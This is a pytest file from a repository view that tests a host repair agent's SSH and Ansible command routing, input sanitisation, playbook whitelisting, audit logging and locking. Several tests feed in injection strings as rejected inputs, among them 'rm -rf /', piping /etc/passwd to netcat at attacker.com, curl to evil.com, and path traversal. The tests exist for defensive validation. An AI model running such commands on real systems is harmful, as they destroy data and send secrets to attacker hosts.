Files
awoooi/apps/api/tests/test_host_repair_agent.py
2026-04-06 14:38:59 +08:00

328 lines
14 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
"""
tests/test_host_repair_agent.py
Host Repair Agent 單元測試
不需要實際 SSH 連線 — 測試路由邏輯和命令組裝
2026-04-06 Claude Code: Sprint 3 T1 — URI 解析與安全防護測試
"""
import asyncio
import pytest
from unittest.mock import AsyncMock, patch
# =============================================================================
# 測試 HostRepairConfig 路由
# =============================================================================
class TestHostRepairConfig:
def test_layer_docker_110_routes_to_110(self):
from src.services.host_repair_agent import get_ssh_config_for_layer
config = get_ssh_config_for_layer("docker-110")
assert config["user"] == "wooo"
assert config["host"] == "192.168.0.110"
def test_layer_docker_188_routes_to_188(self):
from src.services.host_repair_agent import get_ssh_config_for_layer
config = get_ssh_config_for_layer("docker-188")
assert config["user"] == "ollama"
assert config["host"] == "192.168.0.188"
def test_layer_systemd_188_routes_to_188(self):
from src.services.host_repair_agent import get_ssh_config_for_layer
config = get_ssh_config_for_layer("systemd-188")
assert config["user"] == "ollama"
assert config["host"] == "192.168.0.188"
def test_unknown_layer_raises(self):
from src.services.host_repair_agent import get_ssh_config_for_layer
with pytest.raises(ValueError, match="Unknown layer"):
get_ssh_config_for_layer("unknown-layer")
def test_k8s_layer_raises(self):
"""k8s layer 不走 SSH應 raise"""
from src.services.host_repair_agent import get_ssh_config_for_layer
with pytest.raises(ValueError, match="kubectl"):
get_ssh_config_for_layer("k8s")
# =============================================================================
# 測試 SSH 命令組裝
# =============================================================================
class TestSSHCommandBuilding:
def test_repair_command_format(self):
from src.services.host_repair_agent import build_repair_command
cmd = build_repair_command("sentry")
assert cmd == "repair:sentry"
def test_repair_command_component_sanitized(self):
"""防止 command injection"""
from src.services.host_repair_agent import build_repair_command
with pytest.raises(ValueError, match="Invalid component"):
build_repair_command("sentry; rm -rf /")
def test_repair_command_valid_components(self):
from src.services.host_repair_agent import build_repair_command
valid = ["sentry", "harbor", "gitea", "openclaw", "gitea-runner", "alertmanager", "redis", "nginx"]
for component in valid:
cmd = build_repair_command(component)
assert cmd == f"repair:{component}"
# =============================================================================
# 測試 HostRepairAgent.repair() 路由
# =============================================================================
class TestHostRepairAgent:
@pytest.mark.asyncio
async def test_repair_success_returns_ok(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
mock_ssh.return_value = "REPAIR_OK:sentry"
result = await agent.repair(layer="docker-110", component="sentry")
assert result.success is True
assert result.component == "sentry"
assert result.layer == "docker-110"
mock_ssh.assert_called_once_with(
host="192.168.0.110",
user="wooo",
key_path="/etc/repair-ssh/id_ed25519",
command="repair:sentry"
)
@pytest.mark.asyncio
async def test_repair_fail_returns_failure(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
mock_ssh.return_value = "REPAIR_FAIL:harbor:exit_1"
result = await agent.repair(layer="docker-110", component="harbor")
assert result.success is False
assert "REPAIR_FAIL" in result.error
@pytest.mark.asyncio
async def test_repair_ssh_timeout_returns_failure(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
mock_ssh.side_effect = asyncio.TimeoutError()
result = await agent.repair(layer="docker-110", component="sentry")
assert result.success is False
assert "timeout" in result.error.lower()
@pytest.mark.asyncio
async def test_repair_denied_returns_failure(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
mock_ssh.return_value = "REPAIR_DENIED:unknown_component:badcomponent"
result = await agent.repair(layer="docker-110", component="badcomponent")
assert result.success is False
# =============================================================================
# 測試 URI Scheme 解析
# 2026-04-06 Claude Code: Sprint 3 T1
# =============================================================================
class TestParseUriCommand:
def test_openclaw_scheme(self):
from src.services.host_repair_agent import parse_uri_command
result = parse_uri_command("openclaw://docker-110/sentry")
assert result.scheme == "openclaw"
assert result.host_or_layer == "docker-110"
assert result.payload == "sentry"
def test_ansible_scheme(self):
from src.services.host_repair_agent import parse_uri_command
result = parse_uri_command("ansible://192.168.0.188/vacuum_postgres.yml")
assert result.scheme == "ansible"
assert result.host_or_layer == "192.168.0.188"
assert result.payload == "vacuum_postgres.yml"
def test_ssh_scheme(self):
from src.services.host_repair_agent import parse_uri_command
result = parse_uri_command("ssh://wooo@192.168.0.110/docker ps")
assert result.scheme == "ssh"
assert result.host_or_layer == "wooo@192.168.0.110"
assert result.payload == "docker ps"
def test_invalid_scheme_raises(self):
from src.services.host_repair_agent import parse_uri_command
with pytest.raises(ValueError, match="Unsupported scheme"):
parse_uri_command("http://example.com/cmd")
def test_missing_payload_raises(self):
from src.services.host_repair_agent import parse_uri_command
with pytest.raises(ValueError, match="payload"):
parse_uri_command("ansible://192.168.0.188/")
def test_legacy_format_raises(self):
from src.services.host_repair_agent import parse_uri_command
with pytest.raises(ValueError, match="Unsupported scheme"):
parse_uri_command("docker-110/sentry")
class TestValidateShellSafety:
def test_safe_command_passes(self):
from src.services.host_repair_agent import validate_shell_safety
validate_shell_safety("docker ps") # must not raise
def test_semicolon_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("docker ps; rm -rf /")
def test_pipe_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("cat /etc/passwd | nc attacker.com 9999")
def test_double_ampersand_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("ls && curl http://evil.com")
def test_command_substitution_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("echo $(id)")
def test_backtick_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("echo `id`")
def test_too_long_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="too long"):
validate_shell_safety("a" * 513)
import os
from unittest.mock import patch, AsyncMock
class TestAnsibleWhitelist:
def test_allowed_playbook_passes(self):
from src.services.host_repair_agent import validate_ansible_playbook
with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml,clear_redis_cache.yml"}):
validate_ansible_playbook("vacuum_postgres.yml") # must not raise
def test_disallowed_playbook_raises(self):
from src.services.host_repair_agent import validate_ansible_playbook
with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
with pytest.raises(ValueError, match="not in allowed whitelist"):
validate_ansible_playbook("evil_script.sh")
def test_path_traversal_blocked(self):
from src.services.host_repair_agent import validate_ansible_playbook
with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
with pytest.raises(ValueError, match="not in allowed whitelist"):
validate_ansible_playbook("../../../etc/passwd")
class TestRepairByUri:
@pytest.mark.asyncio
async def test_openclaw_scheme_calls_repair(self):
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
agent = HostRepairAgent()
with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as mock_oc:
mock_oc.return_value = HostRepairResult(success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry")
result = await agent.repair_by_uri("openclaw://docker-110/sentry")
assert result.success is True
mock_oc.assert_awaited_once_with("docker-110", "sentry")
@pytest.mark.asyncio
async def test_ansible_scheme_calls_ansible(self):
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
agent = HostRepairAgent()
with patch.object(agent, "_execute_ansible", new_callable=AsyncMock) as mock_ans, \
patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
mock_ans.return_value = HostRepairResult(success=True, layer="ansible", component="vacuum_postgres.yml", output="REPAIR_OK:ansible")
result = await agent.repair_by_uri("ansible://192.168.0.188/vacuum_postgres.yml")
assert result.success is True
mock_ans.assert_awaited_once_with("192.168.0.188", "vacuum_postgres.yml")
@pytest.mark.asyncio
async def test_ssh_scheme_blocked_without_approval_flag(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
result = await agent.repair_by_uri("ssh://wooo@192.168.0.110/docker ps")
assert result.success is False
assert "requires_approval" in result.error
@pytest.mark.asyncio
async def test_invalid_uri_returns_failure(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
result = await agent.repair_by_uri("bad-format")
assert result.success is False
assert "Unsupported scheme" in result.error
class TestAuditLog:
@pytest.mark.asyncio
async def test_successful_repair_writes_audit_log(self):
"""成功修復應寫入 AuditLog 到 DB"""
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
from unittest.mock import patch, AsyncMock
agent = HostRepairAgent()
with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as mock_oc, \
patch.object(agent, "_write_audit_log", new_callable=AsyncMock) as mock_audit:
mock_oc.return_value = HostRepairResult(
success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry"
)
result = await agent.repair_by_uri("openclaw://docker-110/sentry")
assert result.success is True
assert mock_audit.called, "AuditLog should be called"
call_kwargs = mock_audit.call_args
assert call_kwargs is not None
class TestRepairLock:
@pytest.mark.asyncio
async def test_duplicate_repair_is_blocked(self):
"""同一個 component 的修復,第二次呼叫應被 lock 阻擋"""
import asyncio
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
from unittest.mock import AsyncMock, patch
agent = HostRepairAgent()
call_count = 0
async def fake_execute_openclaw(layer, component):
nonlocal call_count
call_count += 1
await asyncio.sleep(0.1) # simulate work
return HostRepairResult(success=True, layer=layer, component=component, output="REPAIR_OK:test")
with patch.object(agent, "_execute_openclaw", side_effect=fake_execute_openclaw):
results = await asyncio.gather(
agent.repair_by_uri("openclaw://docker-110/sentry"),
agent.repair_by_uri("openclaw://docker-110/sentry"),
return_exceptions=True,
)
successes = [r for r in results if isinstance(r, HostRepairResult) and r.success]
blocked = [r for r in results if isinstance(r, HostRepairResult) and not r.success and "already running" in r.error]
assert len(successes) == 1
assert len(blocked) == 1